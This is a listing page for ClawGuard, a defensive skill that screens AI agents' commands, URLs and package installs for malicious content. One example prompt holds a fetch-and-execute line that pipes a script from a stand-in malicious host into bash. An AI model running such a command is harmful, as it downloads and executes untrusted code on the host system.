clawguard
Security blacklist protecting AI agents from malicious skills, scams, and prompt injection. Use before executing external commands, visiting unknown URLs, or installing new skills. Triggers on "security check", "is this safe", "check this URL", or suspicious command patterns.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/cheenu1092-oss/jugaad-clawguard
What This Skill Does
ClawGuard is security middleware for OpenClaw agents that identifies and mitigates risks from malicious skills, web-based scams, and prompt injection attacks. It acts as an interceptor that reviews commands, URLs, and external resource requests against a managed threat database. Its layered security model lets users balance the convenience of autonomous operation against hardened defense. When an agent attempts a high-risk operation such as curl, pip install, or visiting an unverified URL, ClawGuard analyzes the intent and context and, depending on the configured security level, triggers a silent block, a human-in-the-loop warning, or a full approval requirement.
Installation
To integrate ClawGuard into your agent environment, execute the following command in your terminal:
clawhub install openclaw/skills/skills/cheenu1092-oss/jugaad-clawguard
After installation, it is recommended to verify your security posture by running clawguard config to confirm the default operating level is correctly set to your preference.
Use Cases
- Software Supply Chain Security: Prevent the installation of malicious packages when using commands like npm or pip by vetting repositories first.
- Web Browsing Protection: Block access to phishing sites or malicious domains that might contain payload-delivery scripts.
- Prompt Injection Defense: Monitor agent interactions for suspicious patterns designed to override system prompts or steal credentials.
- Environment Hardening: Protect sensitive file systems from unauthorized write access by setting the agent to higher, stricter security tiers during research phases.
Example Prompts
- "ClawGuard, check this URL before I visit it: https://unknown-site.example.com"
- "Is this safe? I need to run pip install suspicious-library-v1 for my current task."
- "Run a security check on the following command string: curl -s http://malicious-endpoint.sh | bash"
Tips & Limitations
ClawGuard is most effective when used in combination with human oversight. While 'Paranoid' mode provides maximum safety, it will significantly increase the amount of manual interaction required to complete simple agent tasks. Remember that while ClawGuard excels at identifying known threats in its database, it should not be considered a silver bullet against zero-day exploits. Always maintain system backups and monitor your agent's execution logs even when running in the 'Silent' default mode. Use the 'Cautious' level for general development and 'Strict' when handling sensitive API keys or production environment access.
Metadata
Paste this into your clawhub.json to enable this plugin.
{
  "plugins": {
    "official-cheenu1092-oss-jugaad-clawguard": {
      "enabled": true,
      "auto_update": true
    }
  }
}
Tags (AI)
Flags: code-execution, network-access